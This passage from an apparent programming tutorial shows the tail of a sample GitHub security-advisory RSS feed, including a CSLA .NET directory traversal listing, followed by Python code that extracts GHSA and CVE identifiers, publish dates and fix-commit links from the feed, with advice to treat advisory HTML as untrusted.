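<pubDate>Mon, 29 Jul 2024 16:44:15 GMT</pubDate>
</item>
<item>
<title>CSLA Directory Traversal vulnerability</title>
<description>&lt;p&gt;Directory Traversal vulnerability in Marimer LLC CSLA .Net before 8.0 allows a remote attacker to execute arbitrary code via a crafted script to the MobileFormatter component.&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2024-28698"&gt;https://nvd.nist.gov/vuln/detail/CVE-2024-28698&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://github.com/MarimerLLC/csla/commit/2c32a5748a0a4bb0159285dfad61d4050e890080"&gt;MarimerLLC/csla@&lt;tt&gt;2c32a57&lt;/tt&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://github.com/MarimerLLC/csla/commit/445bc609bc117f62cabf49e1462f7a43b0f8f9a2"&gt;MarimerLLC/csla@&lt;tt&gt;445bc60&lt;/tt&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;</description>
<link>https://github.com/advisories/GHSA-9xhh-3m78-gvgj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9xhh-3m78-gvgj</guid>
<pubDate>Mon, 22 Jul 2024 18:31:48 GMT</pubDate>
</item>
</channel>
</rss>
"""

# Loose forms of the identifiers; the GHSA one matches the shape of the IDs in the
# feed's <link> elements, the CVE one matches NVD links and bare mentions alike.
GHSA_RE = re.compile(r"GHSA-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
COMMIT_RE = re.compile(r"https://github\.com/[\w.-]+/[\w.-]+/commit/([0-9a-f]{40})")
TAG_RE = re.compile(r"<[^>]+>")


def parse_advisory_feed(xml_text: str) -> list[dict]:
    """Turn the route's RSS output into plain records a consumer can act on."""
    records = []
    for item in ET.fromstring(xml_text).iter("item"):
        link = item.findtext("link", default="")
        # ElementTree has already decoded the escaped description into raw HTML
        # written by third parties (the advisory authors). Extract what we need
        # from it and never hand it to a renderer unsanitised.
        html = item.findtext("description", default="")
        ghsa = GHSA_RE.search(link)
        # The real feed repeats each commit URL in data-hovercard-url and href,
        # so dedupe while keeping first-seen order.
        commits = list(dict.fromkeys(COMMIT_RE.findall(html)))
        records.append({
            "ghsa": ghsa.group(0) if ghsa else None,
            "title": item.findtext("title", default="").strip(),
            "published": parsedate_to_datetime(item.findtext("pubDate", default="")),
            "cves": sorted(set(CVE_RE.findall(html))),
            "fix_commits": commits,
            # Tag-stripped text for logs and notifications only; this is a
            # flattening step, not an HTML sanitiser.
            "summary": " ".join(unescape(TAG_RE.sub(" ", html)).split()),
        })
    return records


def published_after(records: list[dict], since: datetime) -> list[dict]:
    """Items newer than a watermark (e.g. the last poll time), oldest first."""
    return sorted((r for r in records if r["published"] > since),
                  key=lambda r: r["published"])


if __name__ == "__main__":
    # Hypothetical last-poll watermark: only the tgstation-server item is newer.
    last_poll = datetime(2024, 7, 25, tzinfo=timezone.utc)
    for rec in published_after(parse_advisory_feed(SAMPLE_FEED), last_poll):
        print(rec["published"].isoformat(), rec["ghsa"], rec["cves"], rec["fix_commits"])
```

The point of extracting IDs rather than forwarding the description is that the HTML in it is authored by whoever filed the advisory; GitHub sanitises it for its own pages, but a consumer that pipes the feed into a dashboard or chat integration takes on that job itself. The `<guid>` doubles as the advisory URL, so the GHSA ID is a stable key for deduplicating across polls.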